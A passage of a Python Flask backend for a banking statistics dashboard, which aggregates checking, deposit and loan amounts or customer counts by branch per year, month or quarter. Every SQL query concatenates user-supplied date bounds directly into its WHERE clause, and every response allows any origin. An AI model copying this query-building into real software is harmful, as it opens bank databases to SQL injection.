# #fig1, ax1 = plt.subplots( figsize=(6,6)) # set the drawing area size
# fig1, ax1 = plt.subplots()
# ax1.pie(sizes, labels=labels, autopct='%1.0f%%',
# shadow=True, startangle=190)
# ax1.axis('equal')
# if os.path.exists(r'../static/summary.png'):
# os.remove(r'../static/summary.png')
# print('finish remove')
# plt.savefig(r'../static/summary.png')
# #plt.show()
#------------end---------------------
if result_loan or result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnlist_pie_user_all,
'rawData':[
rawData_pie_user_all
]
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
else:
#===================================================================================================
#-------- statistics over time --------- line chart -------
#===================================================================================================
#======================================= total transaction amount ======================================================================
if datatype == 'money':
#=================================== savings business ==================================================================
if sumtype == 'saving':
#=============================== yearly granularity =====================================================================
if timegrain == 'year':
sqlcommand_check = ""
sqlcommand_check_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name1,
NEW_CHECK_ACCOUNT.C_A_money AS C_A_money1,
NEW_CHECK_ACCOUNT.C_A_date AS C_A_date1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID,
CHECK_ACCOUNT_MONEY AS C_A_money,
CHECK_ACCOUNT_REGDATE AS C_A_date
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT,
CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
ORDER BY NEW_CHECK_ACCOUNT.C_A_date ASC
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
columnList = []
rawData = []
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in columnList:
columnList.append(result_check[i]['b_name1'])
for i in range(len(result_check)):
loc = locate(result_check[i]['c_a_date1'].year, rawData)
if loc == -1 :
# a year not yet present in rawData
term = {}
term['time'] = str(result_check[i]['c_a_date1'].year)
term[result_check[i]['b_name1']] = result_check[i]['c_a_money1']
rawData.append(term)
else:
if result_check[i]['b_name1'] not in rawData[loc]:
# the period is already in rawData but this record's branch is not; add it
rawData[loc][result_check[i]['b_name1']] = result_check[i]['c_a_money1']
else:
rawData[loc][result_check[i]['b_name1']] += result_check[i]['c_a_money1']
#----------deposit account--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name2,
NEW_DEPOSIT_ACCOUNT.D_A_money AS D_A_money1,
NEW_DEPOSIT_ACCOUNT.D_A_date AS D_A_date1
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID,
DEPOSIT_ACCOUNT_MONEY AS D_A_money,
DEPOSIT_ACCOUNT_REGDATE AS D_A_date
FROM DEPOSIT_ACCOUNT
WHERE ''' + sqlcommand_deposit_term + '''
)NEW_DEPOSIT_ACCOUNT,
CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
ORDER BY NEW_DEPOSIT_ACCOUNT.D_A_date ASC
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnList:
columnList.append(result_deposit[i]['b_name2'])
for i in range(len(result_deposit)):
loc = locate(result_deposit[i]['d_a_date1'].year, rawData)
if loc == -1 :
# a year not yet present in rawData
term = {}
term['time'] = str(result_deposit[i]['d_a_date1'].year)
term[result_deposit[i]['b_name2']] = result_deposit[i]['d_a_money1']
rawData.append(term)
else:
if result_deposit[i]['b_name2'] not in rawData[loc]:
# the period is already in rawData but this record's branch is not; add it
rawData[loc][result_deposit[i]['b_name2']] = result_deposit[i]['d_a_money1']
else:
rawData[loc][result_deposit[i]['b_name2']] += result_deposit[i]['d_a_money1']
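# Editor's note: for the line chart, rawData is a list of per-year buckets, e.g.
#     [{'time': '2018', 'branch_A': 500.0},
#      {'time': '2019', 'branch_A': 700.0, 'branch_B': 300.0}]
# (values illustrative only); columnList holds the union of branch names.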
if result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
elif timegrain == 'month':
#=============================== monthly granularity =========================================================
sqlcommand_check = ""
sqlcommand_check_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name1,
NEW_CHECK_ACCOUNT.C_A_money AS C_A_money1,
NEW_CHECK_ACCOUNT.C_A_date AS C_A_date1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID,
CHECK_ACCOUNT_MONEY AS C_A_money,
CHECK_ACCOUNT_REGDATE AS C_A_date
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT,
CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
ORDER BY NEW_CHECK_ACCOUNT.C_A_date ASC
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
columnList = []
rawData = []
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in columnList:
columnList.append(result_check[i]['b_name1'])
for i in range(len(result_check)):
loc = locate_month(result_check[i]['c_a_date1'].year,result_check[i]['c_a_date1'].month, rawData)
if loc == -1 :
# a year+month not yet present in rawData
term = {}
yyyy_mm = str(result_check[i]['c_a_date1'].year) + '.' + str(result_check[i]['c_a_date1'].month)
term['time'] = yyyy_mm
term[result_check[i]['b_name1']] = result_check[i]['c_a_money1']
rawData.append(term)
else:
if result_check[i]['b_name1'] not in rawData[loc]:
# the period is already in rawData but this record's branch is not; add it
rawData[loc][result_check[i]['b_name1']] = result_check[i]['c_a_money1']
else:
rawData[loc][result_check[i]['b_name1']] += result_check[i]['c_a_money1']
#----------deposit account--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name2,
NEW_DEPOSIT_ACCOUNT.D_A_money AS D_A_money1,
NEW_DEPOSIT_ACCOUNT.D_A_date AS D_A_date1
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID,
DEPOSIT_ACCOUNT_MONEY AS D_A_money,
DEPOSIT_ACCOUNT_REGDATE AS D_A_date
FROM DEPOSIT_ACCOUNT
WHERE ''' + sqlcommand_deposit_term + '''
)NEW_DEPOSIT_ACCOUNT,
CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
ORDER BY NEW_DEPOSIT_ACCOUNT.D_A_date ASC
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnList:
columnList.append(result_deposit[i]['b_name2'])
for i in range(len(result_deposit)):
loc = locate_month(result_deposit[i]['d_a_date1'].year, result_deposit[i]['d_a_date1'].month, rawData)
if loc == -1 :
# a year+month not yet present in rawData
term = {}
yyyy_mm = str(result_deposit[i]['d_a_date1'].year) + '.' + str(result_deposit[i]['d_a_date1'].month)
term['time'] = yyyy_mm
term[result_deposit[i]['b_name2']] = result_deposit[i]['d_a_money1']
rawData.append(term)
else:
if result_deposit[i]['b_name2'] not in rawData[loc]:
# the period is already in rawData but this record's branch is not; add it
rawData[loc][result_deposit[i]['b_name2']] = result_deposit[i]['d_a_money1']
else:
rawData[loc][result_deposit[i]['b_name2']] += result_deposit[i]['d_a_money1']
if result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#=============================== quarterly ('season') granularity =================================================================
elif timegrain == 'season':
sqlcommand_check = ""
sqlcommand_check_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name1,
NEW_CHECK_ACCOUNT.C_A_money AS C_A_money1,
NEW_CHECK_ACCOUNT.C_A_date AS C_A_date1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID,
CHECK_ACCOUNT_MONEY AS C_A_money,
CHECK_ACCOUNT_REGDATE AS C_A_date
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT,
CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
ORDER BY NEW_CHECK_ACCOUNT.C_A_date ASC
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
columnList = []
rawData = []
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in columnList:
columnList.append(result_check[i]['b_name1'])
for i in range(len(result_check)):
loc = locate_season(result_check[i]['c_a_date1'].year,result_check[i]['c_a_date1'].month, rawData)
if loc == -1 :
# a year-quarter not yet present in rawData
term = {}
s = math.ceil(result_check[i]['c_a_date1'].month/3)
season = str(result_check[i]['c_a_date1'].year) + '-' + str(s)
term['time'] = season
term[result_check[i]['b_name1']] = result_check[i]['c_a_money1']
rawData.append(term)
else:
if result_check[i]['b_name1'] not in rawData[loc]:
# the period is already in rawData but this record's branch is not; add it
rawData[loc][result_check[i]['b_name1']] = result_check[i]['c_a_money1']
else:
rawData[loc][result_check[i]['b_name1']] += result_check[i]['c_a_money1']
#----------deposit account--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name2,
NEW_DEPOSIT_ACCOUNT.D_A_money AS D_A_money1,
NEW_DEPOSIT_ACCOUNT.D_A_date AS D_A_date1
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID,
DEPOSIT_ACCOUNT_MONEY AS D_A_money,
DEPOSIT_ACCOUNT_REGDATE AS D_A_date
FROM DEPOSIT_ACCOUNT
WHERE ''' + sqlcommand_deposit_term + '''
)NEW_DEPOSIT_ACCOUNT,
CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
ORDER BY NEW_DEPOSIT_ACCOUNT.D_A_date ASC
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnList:
columnList.append(result_deposit[i]['b_name2'])
for i in range(len(result_deposit)):
loc = locate_season(result_deposit[i]['d_a_date1'].year, result_deposit[i]['d_a_date1'].month, rawData)
if loc == -1 :
# a year-quarter not yet present in rawData
term = {}
s = math.ceil(result_deposit[i]['d_a_date1'].month/3)
season = str(result_deposit[i]['d_a_date1'].year) + '-' + str(s)
term['time'] = season
term[result_deposit[i]['b_name2']] = result_deposit[i]['d_a_money1']
rawData.append(term)
else:
if result_deposit[i]['b_name2'] not in rawData[loc]:
# the quarter is already in rawData but this record's branch is not; add it
rawData[loc][result_deposit[i]['b_name2']] = result_deposit[i]['d_a_money1']
else:
rawData[loc][result_deposit[i]['b_name2']] += result_deposit[i]['d_a_money1']
if result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
if sumtype == 'loan':
#=============================== loan business =================================================================
#=============================== yearly granularity =================================================================
if timegrain == 'year':
sqlcommand_loan = ""
sqlcommand_loan_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT NEW_PAY.loan_id0 AS loan_id1,
NEW_PAY.pay_date0 AS pay_date1,
NEW_PAY.pay_money0 AS pay_money1,
LOAN.BANK_NAME AS bank_name1
FROM(
SELECT
LOAN_ID AS loan_id0,
PAY_DATE AS pay_date0,
PAY_MONEY AS pay_money0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#-------- result processing ---------
columnList = []
rawData = []
for i in range(len(result_loan)):
if result_loan[i]['bank_name1'] not in columnList:
columnList.append(result_loan[i]['bank_name1'])
for i in range(len(result_loan)):
loc = locate(result_loan[i]['pay_date1'].year, rawData)
if loc == -1 :
# a year not yet present in rawData
term = {}
term['time'] = str(result_loan[i]['pay_date1'].year)
term[result_loan[i]['bank_name1']] = result_loan[i]['pay_money1']
rawData.append(term)
else:
if result_loan[i]['bank_name1'] not in rawData[loc]:
# the period is already in rawData but this record's branch is not; add it
rawData[loc][result_loan[i]['bank_name1']] = result_loan[i]['pay_money1']
else:
rawData[loc][result_loan[i]['bank_name1']] += result_loan[i]['pay_money1']
if result_loan :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#=============================== monthly granularity =================================================================
elif timegrain == 'month':
sqlcommand_loan = ""
sqlcommand_loan_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT NEW_PAY.loan_id0 AS loan_id1,
NEW_PAY.pay_date0 AS pay_date1,
NEW_PAY.pay_money0 AS pay_money1,
LOAN.BANK_NAME AS bank_name1
FROM(
SELECT
LOAN_ID AS loan_id0,
PAY_DATE AS pay_date0,
PAY_MONEY AS pay_money0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#-------- result processing ---------
columnList = []
rawData = []
for i in range(len(result_loan)):
if result_loan[i]['bank_name1'] not in columnList:
columnList.append(result_loan[i]['bank_name1'])
for i in range(len(result_loan)):
loc = locate_month(result_loan[i]['pay_date1'].year,result_loan[i]['pay_date1'].month, rawData)
if loc == -1 :
# a year+month not yet present in rawData
term = {}
term['time'] = str(result_loan[i]['pay_date1'].year) + '.' + str(result_loan[i]['pay_date1'].month)
term[result_loan[i]['bank_name1']] = result_loan[i]['pay_money1']
rawData.append(term)
else:
if result_loan[i]['bank_name1'] not in rawData[loc]:
# the month is already in rawData but this record's branch is not; add it
rawData[loc][result_loan[i]['bank_name1']] = result_loan[i]['pay_money1']
else:
rawData[loc][result_loan[i]['bank_name1']] += result_loan[i]['pay_money1']
if result_loan :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#=============================== quarterly ('season') granularity =================================================================
elif timegrain == 'season':
sqlcommand_loan = ""
sqlcommand_loan_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_loan_term = sqlcommand_loan_term + " AND PAY_DATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_loan = sqlcommand_loan + '''
SELECT NEW_PAY.loan_id0 AS loan_id1,
NEW_PAY.pay_date0 AS pay_date1,
NEW_PAY.pay_money0 AS pay_money1,
LOAN.BANK_NAME AS bank_name1
FROM(
SELECT
LOAN_ID AS loan_id0,
PAY_DATE AS pay_date0,
PAY_MONEY AS pay_money0
FROM PAY
WHERE ''' + sqlcommand_loan_term + '''
)NEW_PAY, LOAN
WHERE NEW_PAY.loan_id0 = LOAN.LOAN_ID
'''
print(sqlcommand_loan)
cursor.execute(sqlcommand_loan)
cursor.rowfactory = makeDictFactory(cursor)
result_loan = cursor.fetchall()
print(result_loan)
#-------- result processing ---------
columnList = []
rawData = []
for i in range(len(result_loan)):
if result_loan[i]['bank_name1'] not in columnList:
columnList.append(result_loan[i]['bank_name1'])
for i in range(len(result_loan)):
loc = locate_season(result_loan[i]['pay_date1'].year,result_loan[i]['pay_date1'].month, rawData)
if loc == -1 :
# a year-quarter not yet present in rawData
s = math.ceil(result_loan[i]['pay_date1'].month/3)
term = {}
term['time'] = str(result_loan[i]['pay_date1'].year) + '-' + str(s)
term[result_loan[i]['bank_name1']] = result_loan[i]['pay_money1']
rawData.append(term)
else:
if result_loan[i]['bank_name1'] not in rawData[loc]:
# the quarter is already in rawData but this record's branch is not; add it
rawData[loc][result_loan[i]['bank_name1']] = result_loan[i]['pay_money1']
else:
rawData[loc][result_loan[i]['bank_name1']] += result_loan[i]['pay_money1']
if result_loan :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
#======================================= user counts ======================================================================
if datatype == 'user':
#=================================== savings business ==================================================================
if sumtype == 'saving':
#=============================== yearly granularity =====================================================================
if timegrain == 'year':
#-------check-----account-----
sqlcommand_check = ""
sqlcommand_check_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_check_term = sqlcommand_check_term + " AND CHECK_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_check = sqlcommand_check + '''
SELECT CUSTOMER_CHECK_ACCOUNT.BANK_NAME AS B_name1,
NEW_CHECK_ACCOUNT.C_A_date0 AS c_a_date1,
CUSTOMER_CHECK_ACCOUNT.CUSTOMER_ID AS customer_id1
FROM(
SELECT
CHECK_ACCOUNT_ID AS C_A_ID0,
CHECK_ACCOUNT_REGDATE AS C_A_date0
FROM CHECK_ACCOUNT
WHERE ''' + sqlcommand_check_term + '''
)NEW_CHECK_ACCOUNT, CUSTOMER_CHECK_ACCOUNT
WHERE NEW_CHECK_ACCOUNT.C_A_ID0 = CUSTOMER_CHECK_ACCOUNT.CHECK_ACCOUNT_ID
'''
print(sqlcommand_check)
cursor.execute(sqlcommand_check)
cursor.rowfactory = makeDictFactory(cursor)
result_check = cursor.fetchall()
print(result_check)
columnList = []
rawData = []
for i in range(len(result_check)):
if result_check[i]['b_name1'] not in columnList:
columnList.append(result_check[i]['b_name1'])
for i in range(len(result_check)):
loc = locate(result_check[i]['c_a_date1'].year, rawData)
if loc == -1 :
# a year not yet present in rawData
term = {}
term['time'] = str(result_check[i]['c_a_date1'].year)
term[result_check[i]['b_name1']] = []
term[result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
rawData.append(term)
else:
if result_check[i]['b_name1'] not in rawData[loc]:
# the period is already in rawData but this record's branch is not; add it
rawData[loc][result_check[i]['b_name1']] = []
# add the new customer to this branch's list
rawData[loc][result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
else:
if result_check[i]['customer_id1'] not in rawData[loc][result_check[i]['b_name1']]:
rawData[loc][result_check[i]['b_name1']].append(result_check[i]['customer_id1'])
#----------deposit account--------
sqlcommand_deposit = ""
sqlcommand_deposit_term = "1=1"  # '1=1' keeps the WHERE clause valid when either bound is empty
if (len(lowerBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE > TO_DATE('" + lowerBound + "','YYYY-MM-DD')"
if (len(upperBound) > 0) :
sqlcommand_deposit_term = sqlcommand_deposit_term + " AND DEPOSIT_ACCOUNT_REGDATE < TO_DATE('" + upperBound + "','YYYY-MM-DD')"
sqlcommand_deposit = sqlcommand_deposit + '''
SELECT CUSTOMER_DEPOSIT_ACCOUNT.BANK_NAME AS B_name2,
NEW_DEPOSIT_ACCOUNT.d_a_date0 AS d_a_date1,
CUSTOMER_DEPOSIT_ACCOUNT.CUSTOMER_ID AS customer_id2
FROM(
SELECT
DEPOSIT_ACCOUNT_ID AS D_A_ID0,
DEPOSIT_ACCOUNT_REGDATE AS d_a_date0
FROM DEPOSIT_ACCOUNT
WHERE '''+ sqlcommand_deposit_term +'''
)NEW_DEPOSIT_ACCOUNT,CUSTOMER_DEPOSIT_ACCOUNT
WHERE NEW_DEPOSIT_ACCOUNT.D_A_ID0 = CUSTOMER_DEPOSIT_ACCOUNT.DEPOSIT_ACCOUNT_ID
'''
print(sqlcommand_deposit)
cursor.execute(sqlcommand_deposit)
cursor.rowfactory = makeDictFactory(cursor)
result_deposit = cursor.fetchall()
print(result_deposit)
#=============User statistics==savings===year granularity===result processing======
for i in range(len(result_deposit)):
if result_deposit[i]['b_name2'] not in columnList:
columnList.append(result_deposit[i]['b_name2'])
for i in range(len(result_deposit)):
loc = locate(result_deposit[i]['d_a_date1'].year, rawData)
if loc == -1 :
#This year is not yet in rawData
term = {}
term['time'] = str(result_deposit[i]['d_a_date1'].year)
term[result_deposit[i]['b_name2']] = []
term[result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
rawData.append(term)
else:
if result_deposit[i]['b_name2'] not in rawData[loc]:
#rawData has this year but not this record's branch; add it
rawData[loc][result_deposit[i]['b_name2']] = []
#Append the new customer to the branch's customer list
rawData[loc][result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
else:
if result_deposit[i]['customer_id2'] not in rawData[loc][result_deposit[i]['b_name2']]:
rawData[loc][result_deposit[i]['b_name2']].append(result_deposit[i]['customer_id2'])
for i in range(len(rawData)):
for key in rawData[i]:
if key != 'time':
if len(rawData[i][key])>0:
rawData[i][key] = len(rawData[i][key])
if result_check or result_deposit :
response = make_response(
jsonify(
{
'code': 200,
'columnList':columnList,
'rawData': rawData
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
response = make_response(
jsonify(
{
'code': 400
}
)
)
response.headers['Access-Control-Allow-Origin'] = '*'
response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'
response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'
return response
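# NOTE (illustrative sketch): locate / locate_month / locate_season are lookup
# helpers defined elsewhere in the file. From their use here they return the
# index of the rawData entry whose 'time' label matches the given period, or
# -1 when it is absent -- a hypothetical equivalent for the yearly case:
#
# def locate(year, raw_data):
#     for i, entry in enumerate(raw_data):
#         if entry['time'] == str(year):
#             return i
#     return -1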
#===============================Month granularity=====================================================================
elif timegrain == 'month':#---
#-------check-----account-----
